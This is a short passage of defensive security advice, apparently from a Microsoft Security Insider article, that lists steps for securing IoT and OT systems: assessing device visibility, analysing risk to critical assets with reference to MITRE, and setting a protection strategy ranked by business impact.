● **Evaluate device visibility:** Next, you should identify which IoT and OT devices are critical assets by themselves and which are associated with other critical assets.

● **Perform a risk analysis on critical assets:** Focus on the business impact of different attack scenarios as suggested by MITRE. This publicly available knowledge base outlines common tactics, techniques, and procedures deployed by cybercriminals, and offers specific guidance for a variety of control systems.

● **Define a strategy:** Finally, define your protection strategy by addressing the risks that you previously identified. Rank risk by business impact priority.

Looking for more tips on how to secure your IoT and OT systems? Explore the full breadth of our cybersecurity research and recommendations with Microsoft's Security Insider.

Tag

#intel